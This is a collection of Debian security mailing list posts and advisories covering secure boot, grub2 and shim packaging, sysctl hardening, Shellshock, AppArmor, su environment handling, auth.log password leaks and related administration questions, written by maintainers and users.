Re: [arm64] secure boot breach via VFIO_NOIOMMU
On Thu, Dec 14, 2023 at 09:26:09AM +0100, Salvatore Bonaccorso wrote: >Hi, > >On Wed, Dec 13, 2023 at 10:45:01PM +0100, Bastian Blank wrote: >> Hi >> >> Over six years ago, support for VFIO without IOMMU was enabled for >> arm64. This is a breach of the integrity lockdown requirement of secure >> boot. >> >> VFIO is a framework for handle devices in userspace. To make >> this safe, an IOMMU is required by default. Without it, user space can >> write everywhere in memory. The code is still not conditional on >> lockdown, even if a patch was proposed. >> >> I intend to disable this option for all supported kernels. Definitely. >Agreed. > >For the readers reading this along, this was raised in context of >https://salsa.debian.org/kernel-team/linux/-/merge_requests/925#note_446730 >and >https://salsa.debian.org/kernel-team/linux/-/merge_requests/502#note_315464 > >The proposed patch felt probably trough the cracks. Nod. -- Steve McIntyre, Cambridge, UK.st...@einval.com The two hard things in computing: * naming things * cache invalidation * off-by-one errors -- Stig Sandbeck Mathisen
DSA-5332 Missing from your cross references page
Hello, I am hoping you can help with an issue we are seeing. We are using your page (https://www.debian.org/security/crossreferences) for cross references of Debian Security Advisories so that we can link the advisories to impacted CVEs. We have noticed that the following Security Advisory is missing: https://security-tracker.debian.org/tracker/DSA-5332-1 Can you tell us whether there is a reason for this, or has this just been missed? If missed, would it be possible to get this data added please? Regards, Steve Steve Mouer, Vice President | Product Management - Vulnerability Management | Cybersecurity and Technology Controls | JPMorgan Chase & Co. 1 Chaseside, Bournemouth, BH7 7DA | T: +44 (0) 1202 323562 |Email: steve.mo...@jpmorgan.com<mailto:steve.mo...@jpmorgan.com> | go/cybervm<http://go/cybervm> This message is confidential and subject to terms at: https://www.jpmorgan.com/emaildisclaimer including on confidential, privileged or legal entity information, malicious content and monitoring of electronic messages. If you are not the intended recipient, please delete this message and notify the sender immediately. Any unauthorized use is strictly prohibited.
[SECURITY] [DSA 5280-1] grub2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-5280-1 secur...@debian.org https://www.debian.org/security/ Steve McIntyre November 15, 2022 https://www.debian.org/security/faq - - Package: grub2 CVE ID : CVE-2022-2601 CVE-2022-3775 Several issues were found in GRUB2's font handling code, which could result in crashes and potentially execution of arbitrary code. These could lead to by-pass of UEFI Secure Boot on affected systems. Further, issues were found in image loading that could potentially lead to memory overflows. For the stable distribution (bullseye), these problems have been fixed in version 2.06-3~deb11u4. We recommend that you upgrade your grub2 packages. For the detailed security status of grub2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/grub2 Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNz7UlfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QAChAAgkTxbFH4Hn0B++K8FgZRI3fw9pacWN+qYOqTOLyUFPzOW3oX3VZEkXr/ 1jQ+pzuylet+aFZDLOyH3y5+sOpt4I5IRCn1INYP8ESXK1m+u68aEo1V5jO+la7I 0L5ZlIjc7c2IJXO6ZRHnOmJxwcZ9bje4vawfa7rT8k4dlSXoICAg2P70VYnqKljZ RdZv+5pNmr4120Fts2tnolI83Rvc/gfP1ru+PWo8Tf0QDihP1pELlpMUtf8Wz0hk pRGuzfVAEN16517Ssasg1rKRa+SSEKnuHXtrUOpDsVNqQwVGac+kOXMUKW08azuk TLlUaWp9MZBiVIXUJnJ8dYWf3ZaO9w5rUPwE8f+urMmj5w+z+v6TuMgE8IGcNr77 S7Dx142gb9Xp1nVoXqu/1Fgk/7JbErbrDUBMIHDoLmsreNrr0r/o/6BfCu/yvMY5 da9VXsD69E8W1V0lJ/UOL38GXW571osReLp7CEWSQf4jxwGRlLyqBkJfVL7+rMDj HL9WPSxLKfW3/9VygQwblRt6tzfzwruToXZLr4A5QCs86ncBFviX7IZpALi56MV+ QQwRXXYp9Y2dL8ZIphZ95oli6jHHqhgQlsnUZqge0JIfrsRmJrLXD1jl4RNL+Uzi rFbI8wO/Mz3udB9HOmt5JEizWW7JFJfY8h+U1G3+ML2drhAiSgU= =yxcT -END PGP SIGNATURE-
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
On Mon, Mar 04, 2019 at 04:30:46PM +, Steve McIntyre wrote: >> >>3. Upload new version of the shim-signed source package and a >> (lightly) bodged binary package >>3a. Use versions: >> - source: 1.28+nmu2 >> - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1 >>3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and >>specifically version 0.9+1474479173.6c180c6-1 of shim in the >>build chroot >>3c. Then upload source+amd64 >>3d. New shim-signed binary package changes in a few ways: >>* new version of the binary now include fbx64.efi.signed and >> mmx64.efi.signed (copied across from the shim binary package) >>* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't >> conflict on those binaries >>* remove Depends: shim (the whole point!) >>* change Build-Depends to list the specific versions used for >> shim and sbsigntool >>3e. Already tested and working. I built this (source and binary >>debdiffs attached) and tested OK on SB system >>3f. This package is instantly RC-buggy due to the unavailable >>build-deps. We know... I've just uploaded #3 to unstable this evening. -- Steve McIntyre, Cambridge, UK.st...@einval.com "You can't barbecue lettuce!" -- Ellie Crane signature.asc Description: PGP signature
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
I've had a reply from Mark (ftpteam) in IRC: On Sun, Mar 03, 2019 at 11:35:45PM +, Steve McIntyre wrote: ... >So, we're looking at three hacky options options here to work our way >out of this hole. In (probably?) descending order of hackitude: > >1. Ask the nice ftpmaster people to bodge the archive by hand: >1a. Remove the current shim source and binary packages from >unstable (version 15+1533136590.3beb971-2) >1b. Copy the older source and binary from buster back into >unstable for us. >1c. We're not even sure if this is *possible*, let alone a nice >thing to do - thoughts? >1d. Expecting that this might break all kinds of tools inside and >outside of the archive maybe? And Mark says: "we don't want to go rewinding version numbers in unstable; that could lead to all sorts of unforeseeable breakage. much as we'd expected. Any more feedback please? Cyril prefers approach #2 below, I prefer #3. >OR > >2. Upload new bodged versions of shim and shim-signed to get us > back to working with the previously-signed shimx64.efi.signed > binary >2a. Create new shim and shim-signed source packages, along with >matching binary packages. >2b. These binary packages will contain the *exact* same EFI >binaries as we have in buster but with a higher version number >in the packaging. >2c. As we cannot *exactly* reproduce the binaries sensibly, we >will have to hand-hack the contents of the binary packages. >2d. We *know* this is grotty too, but we can at least make this >work entirely at a package level. >2e. Already tested and working: Cyril has built packages like this >and I have tested the results successfully on my test SB >system here. > >Current versions in buster: > - shim: >- source: 0.9+1474479173.6c180c6-1 >- binary: 0.9+1474479173.6c180c6-1 > - shim-signed: >- source: 1.28+nmu1 >- binary: 1.28+nmu1+0.9+1474479173.6c180c6-1 > >Possible versions targetting sid: > - shim: > - source: 16+1474479173.6c180c6-1 (bumped “epoch-like” N+ > prefix, but same contents as 0.9+1474479173.6c180c6-1) > - binary: 16+1474479173.6c180c6-1 > - shim-signed: > - source: 1.28+nmu2 (new upload to adjust the Depends) > - binary: 1.28+nmu2+16+1474479173.6c180c6-1 > >OR > >3. Upload new version of the shim-signed source package and a > (lightly) bodged binary package >3a. Use versions: > - source: 1.28+nmu2 > - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1 >3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and >specifically version 0.9+1474479173.6c180c6-1 of shim in the >build chroot >3c. Then upload source+amd64 >3d. New shim-signed binary package changes in a few ways: >* new version of the binary now include fbx64.efi.signed and > mmx64.efi.signed (copied across from the shim binary package) >* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't > conflict on those binaries >* remove Depends: shim (the whole point!) >* change Build-Depends to list the specific versions used for > shim and sbsigntool >3e. Already tested and working. I built this (source and binary >debdiffs attached) and tested OK on SB system >3f. This package is instantly RC-buggy due to the unavailable >build-deps. We know... -- Steve McIntyre, Cambridge, UK.st...@einval.com Is there anybody out there? signature.asc Description: PGP signature
Re: powerpc update for amd64
On Sun Mar 04, 2018 at 07:35:37 +0100, SZÉPE Viktor wrote: > What is the use of pushing an update with only powerpc changes to amd64? > Thank you. This is just a side-effect of the way the packages are built. When a new source upload is made then it is built for all available architectures, even if the changes are not useful / relevant for them. Typically security updates apply to all architectures. In this case just be glad you got "lucky" - and you don't have to schedule reboot(s) of all your server(s). Steve -- https://steve.fi/
Re: [SECURITY] [DSA 3074-2] php5 regression update
On Wed Nov 19, 2014 at 14:57:13 +0100, David MENTRE wrote: so people are advised to keep kernel symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by default on Wheezy This setting is not set on my Wheezy machine. How can I set it permanently (i.e. across reboots). Take a look at /etc/sysctl.conf, and the comments at the top of that file pointing to the man-page and other locations. Steve -- Git-based DNS hosting https://dns-api.com/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20141119140951.ga15...@steve.org.uk
Re: about bash and Debian Lenny
Shellshock has such big impact on the internet so please give us Lenny package. You need to remember that Debian is a project staffed by volunteers, some of whom have already offered packages. If you cannot trust random binaries then the patches are available. If you do have a legitimate reason for not upgrading, then your choices are few - and largely consist of: * Rolling your own packages, via the public patches, which you will then trust. * Finding somebody trustworthy. * Upgrading. My personal response to somebody requesting newer updates has got to be What is your budget?.. Steve -- http://www.steve.org.uk/
Re: goals for hardening Debian: ideas and help wanted
On Thu, Apr 24, 2014 at 11:45:46AM +0200, Giacomo Mulas wrote: On Thu, 24 Apr 2014, Paul Wise wrote: Would the inclusion of more AppArmor profiles be applicable? Thanks, added along with SELinux/etc. I second that. Actually, some time ago I tried using both AppArmor and SELinux, but gave up because it took forever to find legitimate behaviour of all kinds of common packages (most of them standard debian packages) and prepare configuration files for things to work. If debian wants to foster adoption of such security enhancements, it must go to great lengths in making sure that (in order of importance in my humble opinion) 1) all debian-packaged software works (very nearly) out of the box with debian-supported MAC frameworks. It should be very clear that if they don't it's an important bug that needs fixing. For example, such bugs should prevent the inclusion of a package in an official stable release. Or split the main debian archive in two, one that is MAC-ready and one that is not, so each user can decide to only use packages known to work well with debian-supported MAC frameworks. The apparmor policies in Debian apply a principle of minimal harm, confining only those services for which someone has taken the time to verify the correct profile. There are obviously pros and cons to each approach to MAC, which I'm not interested in arguing about; but one of the pros of the approach taken for apparmor is that all software *does* continue to work out of the box. If you found it otherwise, I think you should be filing a bug report against apparmor. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org signature.asc Description: Digital signature
Re: [SECURITY] [DSA 2521-1] libxml2 security update
My guess is libpfhttphook is not vulnerable. I'd like to hear from someone else tho. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679280 -Steve Sent from my phone On Aug 4, 2012, at 12:31, Moritz Muehlenhoff j...@debian.org wrote: CVE-2012-2807 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/d17d2162-1fa7-44d9-9b11-0ec5a5313...@phonefactor.com
Re: Logs errors on Debian Squeeze with Bind 9.7.3
Hello, Couple thoughts: 1) You should add semi-colons onto the end of the category lines within the logging stanza. 2) I take it that you restarted bind after making changes in the configuration file? Also note that /etc/bind/namec.conf.options is the preferred place for the logging stanza, or so I've gathered. Steve http://www.braingia.org/ On Tue, Jun 28, 2011 at 01:13:31PM -0300, OLCESE, Marcelo Oscar. wrote: Good morning people Since I upgraded to BIND 9.7.3 Debian 6, I'm having a lot of logs as I've outlined. error (network unreachable) resolving '98.31.207.117.in-addr.arpa/PTR/IN': 2001:500:13::73#53: 1 Time(s) error (network unreachable) resolving 'ABTS-mp-Dynamic-075.161.168.122.airtelbroadband.in/A/IN': 2001:500:45::1#53: 1 Time(s) error (network unreachable) resolving 'NSS2.CODETEL.NET.DO//IN': 2001:468:d01:20::80df:2023#53: 1 Time(s) error (network unreachable) resolving 'SEC3.APNIC.NET/A/IN': 2001:500:13::c7d4:35#53: 1 Time(s) error (unexpected RCODE REFUSED) resolving '222.187.173.122.in-addr.arpa/PTR/IN': 202.56.230.5#53: 1 Time(s) error (unexpected RCODE REFUSED) resolving '244.76.168.122.in-addr.arpa/PTR/IN': 202.56.230.6#53: 1 Time(s) error (unexpected RCODE REFUSED) resolving 'ns01.wl-infra.net/A/IN': 62.75.191.6#53: 2 Time(s) error (unexpected RCODE SERVFAIL) resolving 'ns6.kvack.org/A/IN': 199.249.120.1#53: 1 Time(s) error (unexpected RCODE SERVFAIL) resolving 'utn.edu.ar/NS/IN': 200.16.98.2#53: 1 Time(s) error (unexpected RCODE SERVFAIL) resolving 'zone-ns6.dnswl.org/A/IN': 199.249.120.1#53: 1 Time(s) success resolving 'ABTS-MP-Dynamic-073.132.175.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s) success resolving 'ABTS-North-Dynamic-222.187.173.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after reducing the advertised EDNS UDP packet size to 512 octets: 1 Time(s) success resolving 'ABTS-North-Static-039.25.160.122.airtelbroadband.in/A' (in 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s) success resolving 'dnsbom.mantraonline.com/' (in 'mantraonline.com'?) after disabling EDNS: 1 Time(s) success resolving 'dnsdel.mantraonline.com/A' (in 'mantraonline.com'?) after disabling EDNS: 1 Time(s) I already made several changes including: /etc/default/bind9 Resolvconf = yes OPTIONS = -4-u bind-S 1024 and named.conf: logging { category lame-servers {null;} category edns-disabled {null;} }; Any ideas? Regards, Marcelo O. -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/F0811723E5FB4D0A9D370D1D702B62D8@Marcelopc -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110628211139.ga11...@braingia.org
Re: [SECURITY] [DSA-2158-1] cgiirc security update
On Fri Feb 11, 2011 at 10:37:46 +0100, Axel Beckert wrote: This package does not yet show up in Lenny. According to http://packages.debian.org/search?keywords=cgiirc 0.5.9-3lenny1 has been uploaded to squeeze's security repo only. Yes - this has been a bit of a mess, due to the release occurring during the middle of the preparation and release of the update. I'm uploading for lenny/old-security now. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110211102255.ga1...@steve.org.uk
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 13:49:23 +1100, Silvio Cesare wrote: lbreakout2 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608980 That could well be a duplicate of CAN-2004-0158, which was fixed in Woody: http://lists.debian.org/debian-changes/2004/02/msg00029.html Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110118091546.ga32...@steve.org.uk
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 22:25:20 +1100, Silvio Cesare wrote: This kind of testing is good for Debian security and provides some comfort to me at least knowing this class of vulnerability has been tested for against the privleged programs in the Debian repository. Agreed. I started doing the same thing a few years ago, and it was very useful. However to make your reports more thorough it is important to look at the source of the code to see if the crash is an exploitable one or not. Ideally you'd include that information in any bug reports you submitted. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110118114447.ga9...@steve.org.uk
Re: libapache2-mod-fcgid in lenny vulnerable to hole for weeks
On Tue Dec 21, 2010 at 22:21:35 +0100, Stefan Fritsch wrote: FWIW, it seems the infrastructure has been finally fixed today, so I hope things will improve now. But I do think that there are currently to few active members in the security team. I am pretty sure we will send out a request for new volunteers soon. If there were a need for it I'd be happy to make myself available again for team work. I don't expect I'm going to suffer from being busy in the way that I was previously again. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20101223140859.ga21...@steve.org.uk
Re: rkhunter warning wget
On Thu Oct 15, 2009 at 17:55:39 +0200, m...@firstfloor.org wrote: after updateing wget on Linux version 2.6.26-2-686 (Debian 2.6.26-19) Lenny i received a waring from rkhunter: Warning: The file properties have changed: File: /usr/bin/wget Current hash: 2d5d175c449eecfda43401a7a66b8a369859524d Stored hash : 1725543768f7e1b2a32136ca1799213a8bdb886b Current inode: 137892Stored inode: 140983 Current size: 226292Stored size: 226260 Current file modification time: 1255005510 Stored file modification time : 1220829421 You've applied a security update, which has changed the binary /usr/bin/wget. The alert is telling you that the binary has changed, and since this is expected (because you've applied the security update) the alert is informational not a real report. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Maintaining packages properly
On Wed Mar 18, 2009 at 21:01:04 -0400, Micah Anderson wrote: However, I do see your point about NEW packages, and it might be interesting, if we could get enough security auditors who had the skills and the time, to be a part of the NEW process. This could introduce an unnecessary delay in the processing of packages, depending on the depth and bredth of such an audit. Or even or a false sense of security if people think that their packages are free of security holes if they've passed NEW. The security audit project mostly seems to have stalled/died. There was a time when there were people actively taking part and doing semi-directed audits of the archive. These days it is very very rare that anybody does so, which is unfortunate (speaking both as the person who started it, and as somebody who would love to have such an effort be more visible and active.) I've been on the point of updating the webpages several times to say this activity is dead, and these are merely historic notes but haven't quite wanted to admit defeat. Maybe more people could join the debian security audit team? For a lot of PHP packages it would be enough to check whether certain functions (e.g. htmlspecialchars) are found. If not, this is often an indication of insufficient protection measures. Calling all interested security people who have just been dying to show their skills, or develop stronger auditing skills! I think if there is no such response then it is definitely time to call it a day and cease pretending we have auditors on hand. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: Why is su preserving the environment?
On Sat, Jan 24, 2009 at 08:41:37AM +0100, Josselin Mouette wrote: it has been brought to my attention (through #512803) that su does not clean the environment at all. This has several security implications: * variables like PERL5LIB or GTK_MODULES can be passed to another user, leading to unwanted execution of code; * variables like DBUS_SESSION_BUS_ADDRESS or XDG_SESSION_COOKIE export authentication information that could be used to obtain private information such as passwords in gnome-keyring. Before I work around this specific issue in the fugliest way, shouldn’t we prevent su from preserving the environment? There have been several security advisories related to sudo not cleaning the environment, and the final call has been to make env_reset the default. Is there any reason why su should not be considered vulnerable the same way? Because su does not attempt to control what commands are being run; if you can su to another user, you can run arbitrary commands as that user, which means there's no sense in trying to filter the environment. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA-1645-1] New lighttpd packages fix various problems
On Mon Oct 06, 2008 at 20:40:36 +0200, Gerfried Fuchs wrote: From reading the changelog these issues have all three been addressed in the 1.4.19-5 upload which was done a week ago already. Was this missed, or are the patches therein considered incomplete? This was missed. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Bug#311772: Fwd: Password leaks are security holes
On Thu, Aug 28, 2008 at 09:36:41AM +0200, Giacomo A. Catenazzi wrote: auth.log was invented for this reason, and separated to standard log: it should be readable only by root, Then there is a bug in another package if this is what should be, because /var/log/auth.log is readable by group adm on all my systems. Anyway root already has the capability to view passwords (i.e. by installing alternate login programs, sniffing tty, ...) If the system uses MAC such as SELinux, this is not necessarily the case. We should design for such future technologies, and not expose passwords unnecessarily. On Thu, Aug 28, 2008 at 01:05:19PM +0200, Johan Walles wrote: auth.log was invented for this reason, and separated to standard log: it should be readable only by root, because users do errors. It's readable by anybody with physical access to the hardware. The logging we're talking about takes place in pam_unix. The normal password store for pam_unix is /etc/shadow, which is on the hard drive; if the user has physical access, they can run a password cracker against this file anyway and try to grab *all* user passwords, not just those of users who don't read before they type. (It's true that the passwords are not in /etc/shadow for systems using pam_unix together with NIS or NIS+, but I consider both NIS and NIS+ rather uninteresting cases.) So auth.log should log usernames, so that users don't do wrong assumption that password are not accessible by root! I can see a point in logging *valid* usernames. Logging invalid usernames (which aren't unlikely to actually be passwords) is a security risk. It provides information about username brute force attacks and other issues of concern to admins. On Thu, Aug 28, 2008 at 11:55:49AM +0200, Nico Golde wrote: Maybe this is the case but that's why this file is only readable for root and the adm group. So if an attacker is able to read this file you have way more problems as he wouldn't need to check the auth log for user errors but could just trace the login process, crack shadow, write a custom pam module or something similar to get your login credentials. No, that's not true. The only added permission the 'adm' group has on Debian is to be able to read log files; so this *does* expose passwords to users who wouldn't otherwise be able to get at them. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ [EMAIL PROTECTED] [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Tue Aug 26, 2008 at 20:13:58 +0200, Christoph Auer wrote: Debian Security Advisory DSA-1631-_2_ [EMAIL PROTECTED] minor error in the subject My apologises, I managed to miss that. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Fri Aug 22, 2008 at 21:56:35 +0200, Christian Jaeger wrote: Just to make sure: have you seen the thread Lenny users: attn about Gnome/libxml2 breakage on the debian-user mailing list (started by me)? No, I'm afraid I've not seen that. But looking over it I'm not sure if the problem is the same. On my personal Debian Unstable machine I'm not seeing any breakage - nor on my Etch system. It is possible it is soley broken on Lenny, but I don't have any systems to look at. I see you've reported a bug, so I guess we'll take it from there. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing server
Le 07-05-2008, à 17:34:08 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) a écrit : just my two pence. and my two centimes. * Change the ports of most ports like ssh, ftp, smtp, imap etc. from the default ones to some other ones. From my poor understanding of security related issues, I guess this is totally useless since any (good) port scanner will defeat this without any problem. Remember, security by obscurity is a bad idea. -- Steve -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: securing server
Le 07-05-2008, à 19:39:57 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) a écrit : haha. not really! if u have really managed an online server u'd have seen tons of attacks and login attempts on your default ports by bots looking around for weaker systems. Yes I have also seen that very often. This is hence especially helpful, I myself have seen these bot attacks reduce to almost zero once i had changed the port numbers of various services on my system. Sure, but that doesn't mean you're more secure, just that you have less scans (which can be achieved by some well-thought iptables rules). Now, you are talking about someone sitting and concentrating on your machine, thats a diff story all together. isn't it? Yep, you're right. If someone really wants to attack you, changing the default ports number will just postpone the moment the attacks will really start. you are smart, you should have known all this. Just tried to pinpoint an issue. Best regards -- Steve -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1534-2] New iceape packages fix regression
On Thu Apr 24, 2008 at 14:13:14 -0700, Brad Dondale wrote: I have started 2 weeks holidays. If you have any technical support requests, please create a ticket with your online ticket system. Thanks! Please fix your broken auto-responding system. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Is oldstable security support duration something to be proud of?
On Mon Mar 10, 2008 at 17:57:04 -0400, Filipus Klutiero wrote: It should be supported as long as RHEL. Give me piles of cash and I'll support it for as long as you want. But this discussion is pointless. The statement is true *we* are proud; regardless of whether you or anybody else agrees or not. As has already been hashed out on the debian-www list. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [vendor-sec] Re: qemu unchecked block read/write vulnerability
Oops, it looks like I got the address wrong. I didn't intend to mail the public [EMAIL PROTECTED] list but rather the private security team list. Too late now. For future reference we do see vendor-sec mails, so the second copy wasn't really necessary. (Although it is helpful to make sure we get mails if it looks like there is no visible progress.) I hope that doesn't make you feel any worse! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange output for command ps
This looks normal to me. I believe 'ps' cuts off the USER column after a certain number of characters. To test, I just added a user 'stevesuehring' to a local Debian etch box and then logged in as that user. The ps output shows 1002 in the USER column rather than the name. Steve On Wed, Jan 30, 2008 at 11:48:10PM +0100, Lindo Nepi wrote: hi all. on my debian box (debian 4.0 , kernel 2.6.18-4-686 #1 SMP Wed May 9 23:03:12 UTC 2007 i686 GNU/Linux ) when i do ps aux i obtain: [EMAIL PROTECTED]:~$ ps aux USER PID %CPU %MEMVSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1948 648 ?Ss Jan17 0:01 init [2] root 2 0.0 0.0 0 0 ?SJan17 0:00 [migration/0] root 3 0.0 0.0 0 0 ?SN Jan17 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ?S Jan17 0:00 [events/0] root 5 0.0 0.0 0 0 ?S Jan17 0:00 [khelper] root 6 0.0 0.0 0 0 ?S Jan17 0:00 [kthread] root 9 0.0 0.0 0 0 ?S Jan17 0:00 [kblockd/0] [snip] root 2620 0.0 0.1 1572 572 ?Ss Jan17 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acp 103 2733 0.0 0.1 2252 860 ?Ss Jan17 0:00 /usr/bin/dbus-daemon --system 106 2741 0.0 0.7 5572 4040 ?Ss Jan17 0:01 /usr/sbin/hald root 2742 0.0 0.1 2892 1016 ?SJan17 0:00 hald-runner 106 2748 0.0 0.1 2020 852 ?SJan17 0:00 hald-addon-acpi: listening on acpid socket /var/run 106 2753 0.0 0.1 2020 864 ?SJan17 0:00 hald-addon-keyboard: listening on /dev/input/event0 root 2762 0.0 0.1 1812 620 ?SJan17 0:10 hald-addon-storage: polling /dev/hdd [snip] www-data 6612 0.0 0.8 19112 4144 ?SN 07:36 0:00 /usr/sbin/apache2 -k start www-data 6613 0.0 0.8 19112 4144 ?SN 07:36 0:00 /usr/sbin/apache2 -k start www-data 6614 0.0 0.8 19112 4144 ?SN 07:36 0:00 /usr/sbin/apache2 -k start 121 6678 0.0 22.3 123368 115416 ? SNs 07:44 0:06 /usr/sbin/dansguardian 121 6679 0.0 22.3 123372 115360 ? SN 07:44 0:11 /usr/sbin/dansguardian 121 6680 0.0 22.8 126300 118064 ? SN 07:44 0:03 /usr/sbin/dansguardian 121 24594 0.0 22.5 130296 116300 ? SN 08:22 0:02 /usr/sbin/dansguardian 121 24595 0.0 22.4 126600 116096 ? SN 08:22 0:00 /usr/sbin/dansguardian 121 24596 0.0 22.5 124892 116300 ? SN 08:22 0:01 /usr/sbin/dansguardian 121 24597 0.0 22.4 124240 115944 ? SN 08:22 0:00 /usr/sbin/dansguardian 121 24598 0.0 22.4 123980 115928 ? SN 08:22 0:00 /usr/sbin/dansguardian 121 24599 0.0 22.4 123716 115920 ? SN 08:22 0:00 /usr/sbin/dansguardian 121 24600 0.0 22.4 123748 116052 ? SN 08:22 0:00 /usr/sbin/dansguardian 121 29196 0.0 22.5 153460 116680 ? SN 17:18 0:02 /usr/sbin/dansguardian 121 29197 0.0 22.5 130292 116332 ? SN 17:18 0:00 /usr/sbin/dansguardian 121 29198 0.0 22.4 127920 116224 ? SN 17:18 0:00 /usr/sbin/dansguardian 121 29199 0.0 22.4 124280 116152 ? SN 17:18 0:00 /usr/sbin/dansguardian ^ look here, ps shows UID , not username. It's normal? of course uid=121(dansguardian) gid=114(dansguardian) gruppi=114(dansguardian) thanks LN -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution
